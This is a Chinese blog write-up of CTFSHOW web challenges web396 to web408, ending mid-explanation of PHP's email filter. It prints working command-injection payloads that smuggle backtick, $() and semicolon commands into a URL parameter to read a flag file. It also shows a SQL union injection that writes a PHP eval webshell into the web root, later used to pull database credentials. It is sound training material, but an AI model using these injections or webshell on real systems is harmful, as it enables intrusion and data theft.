<!doctype html>
<html lang="zh"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><title>CTFSHOW | 其他篇题解（一）web396 - web416 - WayneJH Blog</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="WayneJH Blog"><meta name="msapplication-TileImage" content="https://oss.waynejoons.icu/picphoto/favicon.ico"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="WayneJH Blog"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="Welcome to WayneJH Blog - CTF writeups and cybersecurity insights. Here you can learn a lot about cybersecurity knowledge"><meta property="og:type" content="blog"><meta property="og:title" content="CTFSHOW | 其他篇题解（一）web396 - web416"><meta property="og:url" content="https://waynejoon.github.io/posts/ctfshow-others-1-web396-web416/"><meta property="og:site_name" content="WayneJH Blog"><meta property="og:description" content="Welcome to WayneJH Blog - CTF writeups and cybersecurity insights. Here you can learn a lot about cybersecurity knowledge"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="https://waynejoon.github.io/img/waynejoon.jpg"><meta property="article:published_time" content="2025-08-21T02:33:16.000Z"><meta property="article:modified_time" content="2025-11-10T04:10:51.990Z"><meta property="article:author" content="WayneJoon.H"><meta property="article:tag" content="CTFSHOW"><meta property="twitter:card" content="summary"><meta property="twitter:image:src" content="https://waynejoon.github.io/img/waynejoon.jpg"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://waynejoon.github.io/posts/ctfshow-others-1-web396-web416/"},"headline":"CTFSHOW | 其他篇题解（一）web396 - web416","image":["https://waynejoon.github.io/img/waynejoon.jpg"],"datePublished":"2025-08-21T02:33:16.000Z","dateModified":"2025-11-10T04:10:51.990Z","author":{"@type":"Person","name":"WayneJoon.H"},"publisher":{"@type":"Organization","name":"WayneJH Blog","logo":{"@type":"ImageObject","url":{"text":"WayneJH"}}},"description":"CTFSHOW 其他篇第一部分详细题解"}</script><link rel="canonical" href="https://waynejoon.github.io/posts/ctfshow-others-1-web396-web416/"><link rel="icon" href="https://oss.waynejoons.icu/picphoto/favicon.ico"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v6.0.0/css/all.css"><link data-pjax rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@11.7.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link data-pjax rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><!--!--><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/css/justifiedGallery.min.css"><!--!--><!--!--><!--!--><style>.pace{-webkit-pointer-events:none;pointer-events:none;-webkit-user-select:none;-moz-user-select:none;user-select:none}.pace-inactive{display:none}.pace .pace-progress{background:#3273dc;position:fixed;z-index:2000;top:0;right:100%;width:100%;height:2px}</style><script src="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/pace.min.js"></script><!--!--><!--!--><!-- hexo injector head_end start --><script>
  (function () {
      function switchTab() {
          if (!location.hash) {
            return;
          }

          const id = '#' + CSS.escape(location.hash.substring(1));
          const $tabMenu = document.querySelector(`.tabs a[href="${id}"]`);
          if (!$tabMenu) {
            return;
          }

          const $tabMenuContainer = $tabMenu.parentElement.parentElement;
          Array.from($tabMenuContainer.children).forEach($menu => $menu.classList.remove('is-active'));
          Array.from($tabMenuContainer.querySelectorAll('a'))
              .map($menu => document.getElementById($menu.getAttribute("href").substring(1)))
              .forEach($content => $content.classList.add('is-hidden'));

          if ($tabMenu) {
              $tabMenu.parentElement.classList.add('is-active');
          }
          const $activeTab = document.querySelector(id);
          if ($activeTab) {
              $activeTab.classList.remove('is-hidden');
          }
      }
      switchTab();
      window.addEventListener('hashchange', switchTab, false);
  })();
  </script><!-- hexo injector head_end end --><meta name="generator" content="Hexo 7.3.0"><link rel="alternate" href="/atom.xml" title="WayneJH Blog" type="application/atom+xml">
</head><body class="is-3-column"><nav class="navbar navbar-main"><div class="container navbar-container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/">WayneJH</a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">首页</a><a class="navbar-item" href="/archives">归档</a><a class="navbar-item" href="/categories">分类</a><a class="navbar-item" href="/tags">标签</a><a class="navbar-item" href="/links">友链</a><a class="navbar-item" href="/about">关于</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="GitHub" href="https://github.com/waynejoon"><i class="fab fa-github"></i></a><a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="搜索" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-8-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item"><time dateTime="2025-08-21T02:33:16.000Z" title="2025/8/21 10:33:16">2025-08-21</time>发表</span><span class="level-item"><a class="link-muted" href="/categories/CTFSHOW/">CTFSHOW</a></span><span class="level-item">27 分钟读完 (大约4111个字)</span><span class="level-item" id="busuanzi_container_page_pv" style="display:none"><span id="busuanzi_value_page_pv">--</span>次访问</span></div></div><h1 class="title is-3 is-size-4-mobile">CTFSHOW | 其他篇题解（一）web396 - web416</h1><div class="content"><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>由于题目比较多，所以分三个部分来写，这是第一部分</p>
<h2 id="题目列表"><a href="#题目列表" class="headerlink" title="题目列表"></a>题目列表</h2><h3 id="web396"><a href="#web396" class="headerlink" title="web396"></a>web396</h3><p>打开题目，可以看到给出了代码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250820155259833.png"></p>
<p>会解析传入的URL，然后提取其中的host和path放入代码中执行</p>
<p>我们分析一下URL结构，举个例子</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://www.example.com:8080/path/to/resource?user=alice#section1</span><br></pre></td></tr></table></figure>

<table>
<thead>
<tr>
<th align="left">部分</th>
<th align="left">示例</th>
<th align="left">说明</th>
</tr>
</thead>
<tbody><tr>
<td align="left">scheme</td>
<td align="left">https</td>
<td align="left">协议（常见有http、https、ftp等）</td>
</tr>
<tr>
<td align="left">host</td>
<td align="left"><a target="_blank" rel="noopener" href="http://www.example.com/">www.example.com</a></td>
<td align="left">主机地址&#x2F;域名</td>
</tr>
<tr>
<td align="left">port</td>
<td align="left">8080</td>
<td align="left">端口号（省略时默认http是80，https为443）</td>
</tr>
<tr>
<td align="left">path</td>
<td align="left">&#x2F;path&#x2F;to&#x2F;resource</td>
<td align="left">路径，资源在服务器的位置</td>
</tr>
<tr>
<td align="left">query</td>
<td align="left">?user&#x3D;alice</td>
<td align="left">查询参数</td>
</tr>
<tr>
<td align="left">fragment</td>
<td align="left">#section1</td>
<td align="left">页面锚点，供浏览器滚动到指定位置</td>
</tr>
</tbody></table>
<p>回到题目，<code>shell_exec</code>函数可以执行系统命令，因此有很多方法可以做这题</p>
<p><strong>方法一：反引号执行系统命令</strong></p>
<p>用反引号执行系统命令，传入参数</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://`ls`/var/www/html/1.txt</span><br></pre></td></tr></table></figure>

<p>然后打开<code>1.txt</code>查看结果</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250820160928378.png"></p>
<p>直接读取flag即可</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://`cat fl0g.php`/var/www/html/1.txt</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250820161023526.png"></p>
<p><strong>方法二：$()执行系统命令</strong></p>
<p>在Shell脚本或命令行里，<code>$()</code>语法可以用来执行系统命令。它的作用叫“命令替换”：会把括号里的命令先执行，然后用输出结果代替<code>$()</code>这个表达式的内容</p>
<p>读取当前目录内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://$(ls)/var/www/html/1.txt</span><br></pre></td></tr></table></figure>

<p>读取flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://$(cat fl0g.php)/var/www/html/1.txt</span><br></pre></td></tr></table></figure>

<p><strong>方法三：分号截断命令</strong></p>
<p>可以用分号截断当前命令，然后执行新命令，可以直接写文件、写webshell，或者反弹shell都可以，看你喜欢哪个</p>
<p>读取当前目录内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://1/1;echo `ls` &gt; 1.txt</span><br></pre></td></tr></table></figure>

<p>读取flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://1/1;echo `cat fl0g.php` &gt; 1.txt</span><br></pre></td></tr></table></figure>

<h3 id="web397"><a href="#web397" class="headerlink" title="web397"></a>web397</h3><p>这次把内容写进了<code>/tmp</code>目录里</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250820162308362.png"></p>
<p>因为<code>/tmp</code>是在根目录，用<code>../</code>返回上一级即可，方法跟之前一样</p>
<p><strong>方法一：反引号执行系统命令</strong></p>
<p>读取当前目录内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://`ls`/../var/www/html/1.txt</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250820162629249.png"></p>
<p>读取flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://`cat fl0g.php`/../var/www/html/1.txt</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250820162552339.png"></p>
<p><strong>方法二：$()执行系统命令</strong></p>
<p>读取当前目录内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://$(ls)/../var/www/html/1.txt</span><br></pre></td></tr></table></figure>

<p>读取flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://$(cat fl0g.php)/../var/www/html/1.txt</span><br></pre></td></tr></table></figure>

<p><strong>方法三：分号截断命令</strong></p>
<p>读取当前目录内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://1/1;echo `ls` &gt; 1.txt</span><br></pre></td></tr></table></figure>

<p>读取flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://1/1;echo `cat fl0g.php` &gt; 1.txt</span><br></pre></td></tr></table></figure>

<h3 id="web398"><a href="#web398" class="headerlink" title="web398"></a>web398</h3><p>对host部分<strong>过滤了分号</strong>，方法三用不了，其他步骤跟web397一样</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250820162951438.png"></p>
<p><strong>方法一：反引号执行系统命令</strong></p>
<p>读取当前目录内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://`ls`/../var/www/html/1.txt</span><br></pre></td></tr></table></figure>

<p>读取flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://`cat fl0g.php`/../var/www/html/1.txt</span><br></pre></td></tr></table></figure>

<p><strong>方法二：$()执行系统命令</strong></p>
<p>读取当前目录内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://$(ls)/../var/www/html/1.txt</span><br></pre></td></tr></table></figure>

<p>读取flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://$(cat fl0g.php)/../var/www/html/1.txt</span><br></pre></td></tr></table></figure>

<h3 id="web399"><a href="#web399" class="headerlink" title="web399"></a>web399</h3><p>对host<strong>过滤了分号和&gt;</strong>，影响的还是步骤三，步骤一和步骤二不影响</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250820163409266.png"></p>
<p><strong>方法一：反引号执行系统命令</strong></p>
<p>读取当前目录内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://`ls`/../var/www/html/1.txt</span><br></pre></td></tr></table></figure>

<p>读取flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://`cat fl0g.php`/../var/www/html/1.txt</span><br></pre></td></tr></table></figure>

<p><strong>方法二：$()执行系统命令</strong></p>
<p>读取当前目录内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://$(ls)/../var/www/html/1.txt</span><br></pre></td></tr></table></figure>

<p>读取flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://$(cat fl0g.php)/../var/www/html/1.txt</span><br></pre></td></tr></table></figure>

<h3 id="web400"><a href="#web400" class="headerlink" title="web400"></a>web400</h3><p>在web399的基础上<strong>多过滤了http和https</strong>，且不区分大小写，不过影响不大，步骤跟上题一样</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250820163720550.png"></p>
<p><strong>方法一：反引号执行系统命令</strong></p>
<p>读取当前目录内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://`ls`/../var/www/html/1.txt</span><br></pre></td></tr></table></figure>

<p>读取flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://`cat fl0g.php`/../var/www/html/1.txt</span><br></pre></td></tr></table></figure>

<p><strong>方法二：$()执行系统命令</strong></p>
<p>读取当前目录内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://$(ls)/../var/www/html/1.txt</span><br></pre></td></tr></table></figure>

<p>读取flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://$(cat fl0g.php)/../var/www/html/1.txt</span><br></pre></td></tr></table></figure>

<h3 id="web401"><a href="#web401" class="headerlink" title="web401"></a>web401</h3><p>这题把解析后的URL打印了出来，然后比上题<strong>多过滤了反斜杠</strong>，不过不影响做题</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250820165009918.png"></p>
<p><strong>方法一：反引号执行系统命令</strong></p>
<p>读取当前目录内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://`ls`/../var/www/html/1.txt</span><br></pre></td></tr></table></figure>

<p>读取flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://`cat fl0g.php`/../var/www/html/1.txt</span><br></pre></td></tr></table></figure>

<p><strong>方法二：$()执行系统命令</strong></p>
<p>读取当前目录内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://$(ls)/../var/www/html/1.txt</span><br></pre></td></tr></table></figure>

<p>读取flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://$(cat fl0g.php)/../var/www/html/1.txt</span><br></pre></td></tr></table></figure>

<h3 id="web402"><a href="#web402" class="headerlink" title="web402"></a>web402</h3><p>这题对scheme协议做了过滤，要求不能出现http和https，随便输入个东西替换即可</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250820170019502.png"></p>
<p><strong>方法一：反引号执行系统命令</strong></p>
<p>把http换成1，然后跟之前一样传参即可</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=1://`ls`/../var/www/html/1.txt</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250820170255154.png"></p>
<p>读取1.txt内容</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250820170352451.png"></p>
<p>读取flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=1://`cat fl0g.php`/../var/www/html/1.txt</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250820170320485.png"></p>
<p><strong>方法二：$()执行系统命令</strong></p>
<p>读取当前目录内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=1://$(ls)/../var/www/html/1.txt</span><br></pre></td></tr></table></figure>

<p>读取flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=1://$(cat fl0g.php)/../var/www/html/1.txt</span><br></pre></td></tr></table></figure>

<h3 id="web403"><a href="#web403" class="headerlink" title="web403"></a>web403</h3><p>先看看代码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250820170825682.png"></p>
<p>过滤规则改了，我们分析一下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/^((2[0-4]\d|25[0-5]|[01]?\d\d?)\.)&#123;3&#125;(2[0-4]\d|25[0-5]|[01]?\d\d?)$/&#x27;</span>, <span class="variable">$url</span>[<span class="string">&#x27;host&#x27;</span>]))&#123;</span><br></pre></td></tr></table></figure>

<p>这段代码用正则表达式判断 <code>$url[&#39;host&#39;]</code> 是否是一个<strong>合法的IPv4地址</strong>。具体解释如下：</p>
<ul>
<li><code>/^...$/</code> ：匹配<strong>整个字符串</strong>（从头到尾），保证整个输入就是IP，不夹杂其他字符</li>
<li><code>((2[0-4]\d|25[0-5]|[1]?\d\d?)\.)&#123;3&#125;</code> ：匹配前三段，每段<strong>数字+点</strong>。每段数字规则如下：<ul>
<li><code>2[0-4]\d</code>：匹配200-249</li>
<li><code>25[0-5]</code>：匹配250-255</li>
<li><code>?\d\d?</code>：匹配0-199（包括1位、2位、3位数字，即0-9、00-99、100-199）</li>
</ul>
</li>
<li>最后一段没有点，只剩数字部分，规则同上</li>
</ul>
<p>综合起来，这个正则表达式能精确匹配<strong>0.0.0.0~255.255.255.255</strong>范围内的IPv4地址格式</p>
<p>因此之前的方法一和方法二都用不了，但是方法三可以用了，咱们用分号截断之前的命令并执行新命令</p>
<p>读取当前目录内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://127.0.0.1/1;echo `ls` &gt; 1.txt</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250820172301463.png"></p>
<p>读取flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://127.0.0.1/1;echo `cat fl0g.php` &gt; 1.txt</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250820172355894.png"></p>
<h3 id="web404"><a href="#web404" class="headerlink" title="web404"></a>web404</h3><p>这题说起来挺好笑的，刚开始看到标题写了“容器生成较慢，得多等一会儿”，我真以为要多等一会，硬生生等了几十分钟，结果点进去还是404，就觉得奇怪。后面看到图片还一闪一闪的，好家伙这网页还带自动刷新的，发现不对劲后点开源码看看，结果真被坑了</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250820180155265.png"></p>
<p>后面想了一会，应该是因为这题是web404，估计官方想借此整活，也是被气笑了</p>
<p>回归正题，我们看到源码里写了<code>404.php</code>，拼接进网页访问</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250820180447119.png"></p>
<p>可以看到比上题多了个正则匹配</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/^\/[A-Za-z0-9]+$/&#x27;</span>, <span class="variable">$url</span>[<span class="string">&#x27;path&#x27;</span>]))&#123;</span><br></pre></td></tr></table></figure>

<p>简单来说，这个正则表达式检测的字符串必须是：</p>
<ul>
<li>以斜杠 <code>/</code> 开头</li>
<li>斜杠后面跟着至少一个字母或数字</li>
<li>整个字符串中不能有空格或其他符号</li>
</ul>
<p>比如符合的路径有：</p>
<ul>
<li><code>/abc</code></li>
<li><code>/A1B2C3</code></li>
<li><code>/12345</code></li>
</ul>
<p>然后host部分的正则匹配也改了</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/((2[0-4]\d|25[0-5]|[01]?\d\d?)\.)&#123;3&#125;(2[0-4]\d|25[0-5]|[01]?\d\d?)./&#x27;</span>, <span class="variable">$url</span>[<span class="string">&#x27;host&#x27;</span>]))&#123;</span><br></pre></td></tr></table></figure>

<p>其中：</p>
<ul>
<li><code>(2[0-4]\d|25[0-5]|[1]?\d\d?)</code> 是0-255范围内的一段数字</li>
<li><code>((...)\.)&#123;3&#125;</code> 表示前三个数字段加点</li>
</ul>
<p>但因为最后的<code>.</code>是匹配<strong>任意字符</strong>，该正则会匹配形如“192.168.1.1a”或“10.0.0.1&#x2F;”这类，末尾允许<strong>至少跟着一个字符</strong>，不是严格的IP地址校验。而且也没有用开头 ^ 和结尾 $ 锚点来表示必须完全匹配整个字符串，这给了我们机会，可以用<strong>分号截断命令</strong></p>
<p>读取当前目录内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://127.0.0.1;echo `ls` &gt; 1.txt;/1</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250820181549912.png"></p>
<p>读取flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://127.0.0.1;echo `cat fl0g.php` &gt; 1.txt;/1</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250820181638133.png"></p>
<h3 id="web405"><a href="#web405" class="headerlink" title="web405"></a>web405</h3><p>先看看代码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250820183217894.png"></p>
<p>这次多了对scheme的检测，要求必须包含波浪号、点号或者php字符其中之一，因此我们改一下协议即可，方法跟之前一样</p>
<p>读取当前目录内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=php://127.0.0.1;echo `ls` &gt; 1.txt;/1</span><br></pre></td></tr></table></figure>

<p>读取flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=php://127.0.0.1;echo `cat fl0g.php` &gt; 1.txt;/1</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250820183649958.png"></p>
<h3 id="web406"><a href="#web406" class="headerlink" title="web406"></a>web406</h3><p>先看代码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250820190938766.png"></p>
<p>源码提示<code>flag in db</code>，说明flag放在数据库。然后对传入的参数url进行了过滤，去除了无效url地址</p>
<p>用<strong>联合注入</strong>写入webshell即可，空格用<code>/**/</code>代替，不然会不行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?url=http://127.0.0.1/&#x27;union/**/select/**/1,&#x27;&lt;?=eval($_POST[1]);?&gt;&#x27;/**/into/**/outfile/**/&#x27;/var/www/html/1.php#</span><br></pre></td></tr></table></figure>

<p>然后打开<code>1.txt</code>查看，可以看到成功写入</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250820193733048.png"></p>
<p>蚁剑连接webshell即可</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250820193827881.png"></p>
<p>可以看到有个<code>config.php</code>配置文件</p>
<p><img src="https://oss.waynejoons.icu/picphoto/image-20250820193919455.png"></p>
<p>打开可以获取数据库账号密码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250820193954972.png"></p>
<p>然后打开数据库操作页面</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250820194044451.png"></p>
<p>添加数据库，如图所示</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250820194125236.png"></p>
<p>成功找到flag</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250820194207134.png"></p>
<h3 id="web407"><a href="#web407" class="headerlink" title="web407"></a>web407</h3><p>先看代码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250820200550677.png"></p>
<p>这题改成了要求输入参数ip，且要求必须为IP地址以通过<code>FILTER_VALIDATE_IP</code>验证</p>
<p>然后我们的目标是执行cafe类的add函数，可以用<code>::</code>来调用函数</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?ip=cafe::add</span><br></pre></td></tr></table></figure>

<p>cafe::add会被当成IPv6地址，从而通过<code>FILTER_VALIDATE_IP</code>验证，展开的话就类似</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cafe:0000:0000:0000:0000:0000:0000:0add</span><br></pre></td></tr></table></figure>

<p>然后打开网页源代码查看flag即可</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250820202126390.png"></p>
<p>我们分析一下IPv6构造：</p>
<p>IPv6地址的构造规则比较复杂，支持多种简写和压缩形式</p>
<ul>
<li>IPv6地址由8组4位十六进制数字（0-9，a-f）组成，中间用冒号 <code>:</code> 分隔，如 <code>2001:0db8:85a3:0000:0000:8a2e:0370:7334</code></li>
<li>可以使用双冒号 <code>::</code> 缩写连续的零，比如 <code>2001:db8::1</code> 表示中间连续的0可省略</li>
<li>各部分区段中的数字可以使用小写或大写的十六进制字符</li>
</ul>
<p>用个表格来概括就是</p>
<table>
<thead>
<tr>
<th align="left">特点</th>
<th align="left">说明</th>
</tr>
</thead>
<tbody><tr>
<td align="left">长度</td>
<td align="left">128位（二进制）</td>
</tr>
<tr>
<td align="left">分组</td>
<td align="left">8组，每组16位，用冒号分隔</td>
</tr>
<tr>
<td align="left">表示</td>
<td align="left">采用十六进制数字表示，每组4位</td>
</tr>
<tr>
<td align="left">前导零省略</td>
<td align="left">可省略每组开头的零</td>
</tr>
<tr>
<td align="left">连续多个0压缩为<code>::</code></td>
<td align="left">每个地址只能出现一次<code>::</code></td>
</tr>
<tr>
<td align="left">地址类型多样</td>
<td align="left">单播、组播、任播，特殊前缀表示不同用途</td>
</tr>
<tr>
<td align="left">IPv4兼容和过渡地址</td>
<td align="left">支持将IPv4嵌入IPv6地址</td>
</tr>
<tr>
<td align="left">接口标识符自动生成</td>
<td align="left">通过EUI-64等标准根据MAC生成</td>
</tr>
</tbody></table>
<p>例如，典型IPv6地址是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">2001:0db8:85a3::8a2e:0370:7334</span><br></pre></td></tr></table></figure>

<p>它等价于展开的</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">2001:0db8:85a3:0000:0000:8a2e:0370:7334</span><br></pre></td></tr></table></figure>

<h3 id="web408"><a href="#web408" class="headerlink" title="web408"></a>web408</h3><p>先看代码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250820210526263.png"></p>
<p>这次改成了验证是否满足邮箱格式了，我们介绍一下<code>FILTER_VALIDATE_EMAIL</code></p>
<p><code>FILTER_VALIDATE_EMAIL</code> 是 PHP 内置的一个专门用来<strong>验证电子邮件格式是否合法</strong>的过滤器</p>
<p>它会根据<strong>RFC 5322标准</strong>对邮箱格式做校验，包括：</p>
<ul>
<li>检查是否存在且且只有一个 <code>@</code> 符号</li>
<li><code>@</code> 前面的部分是邮箱用户名，允许的字符包括字母、数字、点 (<code>.</code>)、下划线 (<code>_</code>) 和连字符 (<code>-</code>) 等</li>
